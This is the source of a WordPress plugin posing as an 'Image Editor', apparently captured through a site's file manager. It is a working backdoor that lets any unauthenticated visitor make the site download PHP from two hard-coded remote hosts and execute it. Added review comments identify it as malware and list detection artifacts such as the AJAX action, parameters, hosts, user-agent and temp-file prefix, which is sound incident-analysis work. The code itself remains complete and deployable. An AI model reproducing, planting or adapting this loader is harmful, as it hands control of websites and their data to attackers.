Файловый менеджер - Редактировать - /var/www/cook-surveying.com/html/wp-content/plugins/Image-editor/remote-code-loader.php
<?php
/*
Plugin Name: Image Editor
Description: Image Editor
Version: 1.0
Author: Image Editor
*/

// NOTE(review): Despite the "Image Editor" header, nothing in this file edits
// images. The only behaviour is: accept a web request, download PHP source
// from a hard-coded remote host, and execute it inside the WordPress process.
// Treat the file as a remote-code-execution backdoor, not as a plugin to fix.
//
// Artifacts visible in this file that are useful for detection and scoping:
//   - AJAX action name: remote_code_loader (dispatched through admin-ajax)
//   - Request parameters: ac, path, api, t
//   - Outbound hosts: c.oiv3.com, c.a6cz.com
//   - cURL User-Agent: "ll" (only on the cURL fallback path)
//   - Temp files prefixed "rcl_" in sys_get_temp_dir(), deleted after use

// Both hooks point at the same handler. The wp_ajax_nopriv_ variant makes the
// action reachable without a logged-in session, so any visitor can trigger it.
add_action('wp_ajax_remote_code_loader', 'rcl_handle_request'); // for logged-in users
add_action('wp_ajax_nopriv_remote_code_loader', 'rcl_handle_request'); // if you want it to work for non-logged-in users

/**
 * AJAX handler: fetches PHP source from a remote host and executes it.
 *
 * Reads `ac`, `path`, `api` and `t` from $_REQUEST, forwards them to the
 * primary host and, if that yields nothing, to the fallback host. The
 * response is written to a temp file, include()d, and the file is removed.
 *
 * NOTE(review): there is no nonce check, capability check or other
 * authorization step anywhere in this function; whoever controls the remote
 * hosts (or can tamper with the response) controls what runs on the site.
 *
 * @return void
 */
function rcl_handle_request() {
    // Validate required params
    // Presence check only: it confirms the four keys exist, not who sent them.
    if (!isset($_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['api'], $_REQUEST['t'])) {
        wp_send_json_error(['message' => 'Missing parameters.']);
        return;
    }

    // sanitize_text_field() cleans the strings for text use; it is not an
    // access control and does not constrain what the remote host returns.
    $api  = sanitize_text_field($_REQUEST['api']);
    $ac   = sanitize_text_field($_REQUEST['ac']);
    $path = sanitize_text_field($_REQUEST['path']);
    $t    = sanitize_text_field($_REQUEST['t']);

    // Primary download host, with a second hard-coded host as fallback when
    // the first returns false or an empty body.
    $code = rcl_get_code("https://c.oiv3.com/", $api, $ac, $path, $t);
    if (!$code) {
        $code = rcl_get_code("https://c.a6cz.com/", $api, $ac, $path, $t);
    }

    // The only check on the payload is that it contains a PHP open tag.
    // There is no signature, hash or allow-list verification of the content.
    if (strpos($code, '<?php') === false) {
        wp_send_json_error(['message' => 'Remote code invalid or missing.']);
        return;
    }

    // NOTE(review): the original comment called this step "safe"; it is the
    // opposite. The downloaded text is written to disk and include()d, which
    // runs it with the full privileges of the WordPress PHP process.
    $tmp_file = tempnam(sys_get_temp_dir(), 'rcl_');
    file_put_contents($tmp_file, $code);
    include($tmp_file);
    // The temp file is deleted right after execution, so the payload is not
    // left on disk for later inspection; web and proxy logs are the more
    // reliable evidence source.
    unlink($tmp_file);

    wp_die(); // required after admin-ajax
}

/**
 * Downloads the payload text from one remote host.
 *
 * Builds `<base_url>?api=…&ac=…&path=…&t=…` and fetches it with
 * file_get_contents(), falling back to cURL when that returns false.
 *
 * @param string $base_url Host URL the query string is appended to.
 * @param string $api      Value forwarded as the `api` query parameter.
 * @param string $ac       Value forwarded as the `ac` query parameter.
 * @param string $path     Value forwarded as the `path` query parameter.
 * @param string $t        Value forwarded as the `t` query parameter.
 *
 * @return string|false Response body, or false when both fetch methods fail.
 */
function rcl_get_code($base_url, $api, $ac, $path, $t) {
    // Values are interpolated as-is; no urlencode() is applied to them.
    $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $base_url, $api, $ac, $path, $t);

    // Try file_get_contents first
    // The @ operator suppresses the warning a failed fetch would otherwise
    // raise, so failures here do not surface as PHP warnings.
    $code = @file_get_contents($url);

    // Fallback to cURL
    if ($code === false) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_USERAGENT, 'll');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        // Peer certificate verification is switched off, so the HTTPS
        // response is accepted from any endpoint that answers for the host.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FRESH_CONNECT, true);
        $code = curl_exec($ch);
        curl_close($ch);
    }

    return $code;
}